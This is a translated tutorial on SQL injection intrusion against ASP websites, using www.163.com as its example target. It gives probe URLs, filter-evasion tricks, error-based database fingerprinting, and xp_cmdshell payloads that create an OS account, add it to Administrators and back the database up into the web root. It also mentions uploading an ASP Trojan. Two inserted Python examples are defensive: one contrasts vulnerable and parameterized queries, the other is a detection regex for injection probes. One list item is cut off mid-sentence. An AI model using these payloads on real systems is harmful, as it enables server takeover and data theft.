<1> SQL injection overview
Many website programs are written without validating the data that users submit,
which leaves the application with a security risk. A user can submit a piece of database query code
(typically in the browser address bar, through the normal WWW port)
and, based on the results the program returns, obtain data he wants to know.
This is called SQL injection.
<2> SQL injection approach
The approach matters most.
In fact, a lot of people do not know what SQL can really do.
Here is a summary of the general approach of a SQL injection intrusion:
1. Test for a SQL injection vulnerability, that is, find the injection point
2. Determine the back-end database type
3. Determine whether xp_cmdshell can be executed. If the account used by the current connection has SA permission
and the master.dbo.xp_cmdshell extended stored procedure (which invokes the operating system shell directly) executes correctly, the entire computer can be completely
controlled, which completes the whole injection process.
Otherwise continue:
1. Discover the web virtual directory
2. Upload an ASP Trojan horse
3. Get administrator privileges
Specific steps
I. Testing for a SQL injection vulnerability
If you have never tested for injection before,
first go to the IE menu Tools - Internet Options - Advanced and clear the check box in front of "Show friendly HTTP error messages".
To illustrate the problem, the following uses HTTP://www.163.com/news.asp?id=xx as the example (this address is hypothetical);
xx may be an integer, or it may be a string.
1. Testing an integer parameter
When the input parameter xx is an integer, the SQL statement in news.asp typically looks like this:
select * from <table name> where <field>=xx, so you can test for SQL injection with the following steps.
The simplest test:
HTTP://www.163.com/news.asp?id=xx' (append a single quote).
At this point the SQL statement in news.asp becomes
select * from <table name> where <field>=xx'
If the program does not filter the "'" character,
news.asp will report that it ran abnormally.
This method is simple, but it is not the best, for two reasons.
First, not every server's IIS returns a specific error message to the client.
If the program applies a statement such as CInt(parameter), SQL injection will not succeed,
but the server will still report an error. The message reads: an error occurred on the server while processing the URL.
Please contact your system administrator.
Second, most programmers now filter out "'", so "'" cannot be used to find the injection point.
For these reasons the classic 1=1 and 1=2 test is commonly used instead.
See below:
HTTP://www.163.com/news.asp?id=xx and 1=1: news.asp runs normally,
and the result is the same as for HTTP://www.163.com/news.asp?id=xx;
HTTP://www.163.com/news.asp?id=xx and 1=2: news.asp runs abnormally. (This is the classic 1=1, 1=2 test.)
If all of the above hold, news.asp has a SQL injection vulnerability; otherwise it cannot be injected.
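Why the 1=1 / 1=2 test succeeds against concatenated SQL and fails once the parameter is cast or bound, shown as an added example that is not part of the original article. It assumes an in-memory SQLite database as a stand-in for the Access or SQL Server back end; the table, data and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the table behind news.asp.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "first story"), (2, "second story")])
    return db

def fetch_concat(db, raw_id):
    # Vulnerable pattern: the raw parameter becomes part of the SQL text.
    sql = "SELECT title FROM news WHERE id=" + raw_id
    return [row[0] for row in db.execute(sql)]

def fetch_cast(db, raw_id):
    # Equivalent of CInt(parameter): anything that is not an integer is rejected.
    try:
        news_id = int(raw_id)
    except ValueError:
        return None  # the caller would show a generic error page
    sql = "SELECT title FROM news WHERE id=" + str(news_id)
    return [row[0] for row in db.execute(sql)]

def fetch_bound(db, raw_id):
    # Parameterized query: the value is bound and never parsed as SQL.
    cur = db.execute("SELECT title FROM news WHERE id=?", (raw_id,))
    return [row[0] for row in cur]

def responds_to_boolean_test(fetch, db, base="1"):
    # The check described above: "and 1=1" matches the original page,
    # "and 1=2" differs from it.
    try:
        normal = fetch(db, base)
        return (fetch(db, base + " and 1=1") == normal
                and fetch(db, base + " and 1=2") != normal)
    except sqlite3.Error:
        return False

if __name__ == "__main__":
    for fetch in (fetch_concat, fetch_cast, fetch_bound):
        print(fetch.__name__, responds_to_boolean_test(fetch, make_db()))
```

Only `fetch_concat` answers the boolean test; the cast version rejects the input outright, and the bound version treats the whole string as a value that matches no row.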
2. Testing a string parameter
The method is basically the same as for a numeric parameter.
When the input parameter xx is a string, the SQL statement in news.asp typically looks like this:
select * from <table name> where <field>='xx', so you can test for SQL injection with the following steps.
HTTP://www.163.com/news.asp?id=xx' (append a single quote): the SQL statement in news.asp becomes
select * from <table name> where <field>='xx'', and news.asp runs abnormally;
HTTP://www.163.com/news.asp?id=xx and '1'='1': news.asp runs normally,
and the result is the same as for HTTP://www.163.com/news.asp?id=xx;
HTTP://www.163.com/news.asp?id=xx and '1'='2': news.asp runs abnormally.
If all of the above hold, news.asp has a SQL injection vulnerability; otherwise it cannot be injected.
3. Handling special cases
Sometimes ASP programmers filter out single quotes and other characters in the program to prevent SQL injection. In that case the following methods can be tried.
① Mixed-case method: because VBS is not case-sensitive, programmers usually filter either the all-uppercase string or the all-lowercase string, while mixed-case forms tend to
be overlooked, for example a mixed-case spelling of select in place of select or SELECT;
② Unicode method: IIS uses the Unicode character set for internationalization, so the string typed into IE can be converted to its Unicode form, for example + = %2b, space = %20, and so on;
for URL-encoding details see Annex I;
③ ASCII code method: You can put the input of some or all of the characters all
④ In addition to the above methods, there is a simpler way: use an off-the-shelf tool.
The NB Alliance's NBSI, for example, is a very good tool; the latest version is 2.2.
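The filter gaps listed above (mixed case, URL encoding) are also why a detection rule has to normalise a query string before matching it. The following is an added example, not code from the original article: the pattern list, names and sample inputs are assumptions constructed for illustration and are not exhaustive.

```python
import re
from urllib.parse import unquote_plus

# Probe shapes named in this article, matched against normalised text.
PROBES = {
    "trailing-quote": re.compile(r"'\s*$"),
    "boolean-test": re.compile(r"\band\s+'?\s*\d+\s*'?\s*=\s*'?\s*\d+"),
    "sql-keyword": re.compile(
        r"\b(select|exec|xp_cmdshell|sysobjects|msysobjects)\b"),
}

def normalise(value, max_rounds=3):
    # Undo URL encoding (repeatedly, to cover double encoding), collapse
    # whitespace and fold case, so SeLeCt and %20 look like "select" and " ".
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).lower()

def classify(query_string):
    # Return the sorted names of every probe shape found in the query string.
    text = normalise(query_string)
    return sorted(name for name, rx in PROBES.items() if rx.search(text))

# Constructed query strings in the style of a web server access log.
SAMPLES = [
    "id=12",
    "id=12'",
    "id=12%20AnD%201%3D2",
    "id=12%2520and%2520(SeLeCt%2520count(*)%2520from%2520sysobjects)>0",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(qs, "->", classify(qs) or "clean")
```

A filter that compares the raw string against lowercase keywords misses the last two samples; after normalisation both are flagged.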
II. Determining the database type
Different databases differ in their functions and injection methods, so the database type has to be determined before injecting. The databases most commonly used with ASP are Access and
SQL Server; more than 99% of the websites on the web use one of them.
How do you get the program to tell you which database it uses? Let's see:
SQL Server has some system variables. If the server's IIS error messages are not turned off and SQL Server returns errors, their values can be read directly from the error message:
HTTP://www.163.com/news.asp?id=xx;and user>0
This statement is simple, but it contains the essence of the SQL Server-specific injection method; I found this highly efficient way of guessing by accident during a test. Let's look at what it means.
First, the part before it is a normal statement; the emphasis is on and user>0. user is a built-in variable of SQL Server whose value is the user name of the current connection and whose type is
nvarchar. When an nvarchar value is compared with the int value 0, the system first tries to convert the nvarchar value to int. The conversion is bound to fail, and SQL Server reports an error such as:
syntax error occurs when converting nvarchar value "abc" to a column with a data type of int. Here abc is the value of the variable user, so the database user name is obtained
with no effort at all. Many statements in the rest of this article work the same way. Incidentally, as everyone knows, SQL Server's user sa is a role with permissions equivalent to Administrators;
with sa permission you can almost certainly obtain administrator on the host. The method above makes it very convenient to test whether the login is sa. Note: with an
sa login, the error says that converting "dbo" to an int column failed, not "sa".
If the server's IIS does not return error messages, how do you determine the database type? Start from the differences between Access and SQL Server. Both have their own
system tables, such as the table that holds all the objects in the database: in Access it is the system table [msysobjects], but reading it in a web environment gives "No permissions"; in SQL Server it is the table
[sysobjects], which can be read normally in a web environment.
Once you have confirmed that injection is possible, use the following statements:
HTTP://www.163.com/news.asp?id=xx and (select count(*) from sysobjects)>0
HTTP://www.163.com/news.asp?id=xx and (select count(*) from msysobjects)>0
If the database is SQL Server, the page for the first URL is roughly the same as the original page HTTP://www.163.com/news.asp?id=xx; the second URL fails because the table
msysobjects cannot be found and produces an error, and even if the program has error handling, the page is completely different from the original page.
If the database is Access, the situation is different: the page for the first URL is completely different from the original page; the second URL depends on whether the database settings allow the system table to be read,
which is generally not allowed, so it is also completely different from the original page. In most cases the first URL is enough to identify the database type; the second URL serves only
as verification when IIS error messages are enabled.
III. Determining whether xp_cmdshell can be executed
If the account used by the current connection has SA permission
and the master.dbo.xp_cmdshell extended stored procedure
(which invokes the operating system shell directly) executes correctly,
the entire computer can be fully controlled in the following ways, and all subsequent steps can be skipped.
1. HTTP://www.163.com/news.asp?id=xx and user>0: news.asp raises an exception, but the error gives the user name of the current database connection (if dbo is displayed, it represents SA).
2. HTTP://www.163.com/news.asp?id=xx and db_name()>0: news.asp raises an exception, but the error gives the name of the currently connected database.
3. HTTP://www.163.com/news.asp?id=xx;exec master..xp_cmdshell "net user aaa bbb /add"-- (master is SQL Server's main
database; the semicolon means that SQL Server finishes the statement before the semicolon and then goes on to execute the statement after it; "--" is the comment marker, meaning everything after it is only a comment and is
not executed by the system) can directly add the operating system account aaa with the password bbb.
4. HTTP://www.163.com/news.asp?id=xx;exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the newly
added account aaa to the Administrators group.
5. HTTP://www.163.com/news.asp?id=xx;backup database <database name> to disk='c:\inetpub\wwwroot\save.db' backs up all of the data content
to the web directory,